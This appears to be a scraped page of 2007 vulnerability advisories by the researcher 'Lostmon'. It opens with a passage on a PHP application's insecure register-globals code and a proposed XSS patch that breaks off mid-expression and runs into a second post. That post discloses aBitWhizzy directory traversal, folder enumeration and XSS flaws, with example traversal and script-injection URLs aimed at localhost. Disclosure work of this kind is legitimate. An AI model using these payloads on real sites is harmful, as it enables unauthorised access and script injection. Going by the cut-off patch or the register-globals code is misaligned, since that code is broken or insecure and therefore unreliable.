vendor url: http://sitex.bjsintay.com/
Specific entry:http://sourceforge.net/tracker/index.php?
func=detail&aid=1700736&group_id=121558&atid=690690
osvdb id:33158,33159,33160,33161
http://archives.neohapsis.com/archives/bugtraq/2007-02/0477.html
http://www.securityfocus.com/archive/1/archive
/1/461305/100/0/threaded
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-1234
after study this vulns i found a simple posible patch.
Some others params are afected like albumid upon submit to albun.php
username box upon submision to login.php ,search box upon submision
to search.php and multiple others params.
The most of those flaws could be solve by a simple patch
for "emergency" before the vendor release a update or a patch.
Open includes/functions.php
arround line 12-13 we have this code
####################################################
// - = - = - = - = - = - = - = - = -
// GLOBAL CODE
// - = - = - = - = - = - = - = - = -
// Convert post, get, and server variables for shorthand use and
// register globals compatibility
if (!empty($_POST)) foreach ($_POST as $k => $v) $$k = $v;
if (!empty($_GET)) foreach ($_GET as $k => $v) $$k = $v;
if (!empty($_SERVER)) foreach ($_SERVER as $k => $v) $$k = $v;
if (!empty($_COOKIE)) foreach ($_COOKIE as $k => $v) $$k = $v;
if (!empty($_SESSION)) foreach ($_SESSION as $k => $v) $$k = $v;
// Prevent PHP include vulnerability, initialize important vars,
will be over-written
##################################################
you can change for this other :
##################################################
// stop XSS function to mitigate the posible XSS flaws
//use StopXSS(param or function)
function StopXSS($text){
$text = preg_replace("/(\ Tuesday, March 27, 2007################################################
aBitWhizzy traversal folder enumeration and XSS
vendor url: http://www.unverse.net/abitwhizzy/
Advisore:http://lostmon.blogspot.com/2007/03/
abitwhizzy-traversal-folder-enumeration.html
vendor notify:YES exploit include:YES
OSVDB ID:34505,34506,34507,34508
Secunia:SA24679
FrSIRT:FrSIRT/ADV-2007-1136
BID:23167
################################################
aBitWhizzy is a php script that uses whizzywig.js to create
and edit web pages through a WYSIWYG interface, right through
your browser. Now your site can be updated by people with no
knowledge of HTML, FTP or AIG (Abbreviations In General).
aBitWhizzy contains a flaw that allows a remote traversal
arbitrary folder enumeration.This flaw exists because the
application does not validate 'd' variable upon submission
to 'whizzylink.php','whizzypic.php','whizzery/whizzypic.php' and 'whizzery/whizzylink.php' scripts.This could allow a
remote users to create a specially crafted URL that would
execute '../' directory traversal characters to view folder
structure on the target system with the privileges
of the target web service.
This input validation error permits too Cross-site scripting
Style attacks and full path disclosure.
###################
VERSIONS
###################
Unknow version of aBitWhizzy
##################
SOLUTION
##################
No solutions was available at this time !!
######################
TIMELINE
######################
discovered:25-03-2007
vendor notify:25-03-2007
vendor response:---------
Private Disclosure:25-03-2007
public disclosure:27-03-2007
#######################
Examples
#######################
Path disclosure:
http://localhost/abitwhizzy/whizzylink.php?d='
http://localhost/abitwhizzy/whizzypic.php?d='
http://localhost/abitwhizzy/whizzery/whizzypic.php?d='
http://localhost/abitwhizzy/whizzery/whizzylink.php?d='
Folder enumeration:
http://localhost/abitwhizzy/whizzylink.php?d=
../../../../../../../Documents%20and%20Settings
http://localhost/abitwhizzy/whizzypic.php?d=
../../../../../../../Documents%20and%20Settings
http://localhost/abitwhizzy/whizzery/whizzypic.php?d=
/../../../../../../../Documents%20and%20Settings
http://localhost/abitwhizzy/whizzery/whizzylink.php?d=
/../../../../../../../Documents%20and%20Settings
Cross Site Scripting:
http://localhost/abitwhizzy/whizzery/whizzypic.php?d=
/../../../../../../../Documents%20and%20Settings
"><SCRIPT>alert('XSS')</SCRIPT>
http://localhost/abitwhizzy/whizzery/whizzylink.php?d=
/../../../../../../../Documents%20and%20Settings
"><SCRIPT>alert('XSS')</SCRIPT>
http://localhost/abitwhizzy/whizzypic.php?d=
../../../../../../../Documents%20and%20Settings
"><SCRIPT>alert('XSS')</SCRIPT>
http://localhost/abitwhizzy/whizzylink.php?d=
../../../../../../../Documents%20and%20Settings
"><SCRIPT>alert('XSS')</SCRIPT>
########################### €nd ###################################
Thnx to estrella Que te ailoviuu un monton ;P
Thnx to all Lostmon´s Group Team
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....